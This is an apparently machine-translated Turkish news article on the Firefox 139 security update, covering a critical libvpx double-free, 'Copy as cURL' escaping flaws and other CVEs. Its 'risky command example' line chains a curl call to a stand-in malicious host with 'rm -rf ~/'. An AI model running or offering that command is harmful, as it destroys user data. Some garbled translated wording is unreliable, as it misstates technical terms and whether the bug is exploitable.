Firefox’taki sıfır etkileşim libvpx kusuru, saldırganların keyfi kod çalıştırmasına izin verir


Mozilla, Firefox 139’u yayınladı ve kullanıcılar için önemli riskler oluşturan birkaç kritik ve ılımlı güvenlik açıklığını ele aldı.

27 Mayıs 2025’te açıklanan güncelleme, bellek bozulması ve yerel kod yürütülmesinden orijin çapraz veri sızıntılarına kadar değişen sorunları çözerek Firefox’un kullanıcı güvenliğine olan bağlılığını güçlendiriyor.

LIBVPX Encoder’da çift ücretsiz:

Firefox 139’da sabitlenen en şiddetli güvenlik açıklarından biri, LIBVPX kodlayıcısında, özellikle de vpx_codec_enc_init_multi Webrtc tarafından kullanılan işlev.

– Reklamcılık –
Google Haberleri

Randell Jesup tarafından bildirilen bu kusur, kodlayıcı başlatma sırasında başarısız bir bellek tahsisinden sonra çiftsiz bir senaryoyu tetikleyebilir.

Sonuç: Potansiyel hafıza yolsuzluğu ve keyfi kod yürütme için kullanılabilecek bir kaza – Mozilla tarafından kritik olarak derecelendirilen bir etki.

Teknik Ayrıntılar:

  • Güvenlik Açığı Türü: Çiftsiz
  • Bileşen: libvpx kodlayıcı (webrtc)
  • İşlev: vpx_codec_enc_init_multi
  • Potansiyel etki: Bellek Yolsuzluğu, Uzak Kod Yürütme

Bir program, aynı bellek konumunu iki kez serbest bırakmaya çalıştığında, tanımlanmamış davranışlara ve genellikle sömürülemez çökmelere yol açtığında bir çift serbest kalır.

Bu hatadan yararlanan saldırganlar, normal göz atmanın ötesinde herhangi bir kullanıcı etkileşimi olmadan bir kullanıcının sistemindeki kötü amaçlı kodları yürütebilir.

“Curl olarak kopyala” yoluyla yerel kod yürütme

Firefox 139 ayrıca, “Curl olarak Kopyala” Geliştirici Araç özelliğindeki iki farklı kusur da dahil olmak üzere birden fazla orta şiddet güvenlik açığını yamalar.

Her ikisi de Ameen Basha MK tarafından bildirildi:

  • CVE-2025-5264: NewLine karakterlerinin yetersiz kaçışı, saldırganların kötü niyetli komutlar üretmesine izin verdi. Bir kullanıcı ise Böyle bir komut kopyaları ve yürütür, yerel kod yürütmesine yol açabilir.
  • CVE-2025-5265: Pencerelerde, aynı özellikteki ampers ve karakterinden kaçınma benzer bir risk yarattı, ancak bu hata Windows için Firefox’a platforma özgü idi.

Riskli komut örneği:

bashcurl "http://malicious.com" && rm -rf ~/

Newline veya ampers ve karakterler düzgün bir şekilde kaçmazsa, bir saldırgan yıkıcı kabuk komutlarını ekleyebilir ve kullanıcıları bunları yürütmeye kandırabilir.

Ek ılımlı güvenlik açıkları şunları içerir:

  • CVE-2025-5263: Komut dosyası yürütme hatası işlemesinin uygunsuz izolasyonu, orantılı sızıntı saldırılarını sağlayan.
  • CVE-2025-5266: Script öğesi olayları, orijinal orijin kaynakları sızdırmaz, XS-Seaks saldırılarını kolaylaştırır.
  • CVE-2025-5268, CVE-2025-5272: Söz konusu ise keyfi kod yürütülmesini sağlayabilecek bellek güvenliği hataları.

Düşük etkili sorunlar ve güvenlik geliştirmeleri

Firefox 139’da ele alınan güvenlik açıklarının çoğu kritik veya ılımlı olsa da, birkaç düşük etkili kusur da düzeltildi:

  • CVE-2025-5270: Bazı durumlarda, sunucu adı göstergesi (SNI) şifreli DNS etkinken bile şifrelenmemiş, potansiyel olarak tarama meta verilerini açığa çıkarabilir.
  • CVE-2025-5271: Devtools önizleme özelliği, içerik enjeksiyon saldırılarının kapısını açarak içerik güvenlik ilkesi (CSP) başlıklarını yok sayılır.
  • CVE-2025-5267: Bir tıklama güvenlik açığı, kötü niyetli sitelere kaydedilmiş ödeme kartı detaylarını sızdırmaya yol açabilir.

Risk Faktörleri Tablosu

Güvenlik Açığı KimliğiBileşen/ÖzellikEtki seviyesiPotansiyel riskPlatform etkilendi
MFSA-TMP-2025-0001libvpx kodlayıcıEleştirelBellek Yolsuzluğu, Kod YürütmeTüm
CVE-2025-5263Komut Dosyası YürütmeIlımanÇapraz Origin Sızıntı SaldırılarıTüm
CVE-2025-5264Curl olarak kopyala (newline)IlımanYerel Kod YürütmeTüm
CVE-2025-5265Curl (ampersand) olarak kopyalaIlımanYerel Kod YürütmeYalnızca pencereler
CVE-2025-5266Komut dosyası öğeleriIlımanXS-Saldırı SaldırılarıTüm
CVE-2025-5270SNI şifrelemesiDüşükMeta veri maruziyetiTüm
CVE-2025-5271Devtools ÖnizlemeDüşükİçerik enjeksiyonuTüm
CVE-2025-5267TıklamaDüşükÖdeme Kartı Veri SızıntısıTüm
CVE-2025-5268/5272Bellek Güvenliği HatalarıIlımanBellek Yolsuzluğu, Kod YürütmeTüm

Firefox 139’un güvenlik güncellemesi, Mozilla’nın hem kritik hem de ılımlı tehditleri azaltma konusundaki proaktif yaklaşımını gösteriyor.

Kullanıcılar, bu temel güvenlik düzeltmelerinden yararlanmak ve güvenli bir tarama ortamını korumak için en son sürüme güncellemeye teşvik edilir.

Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!



Source link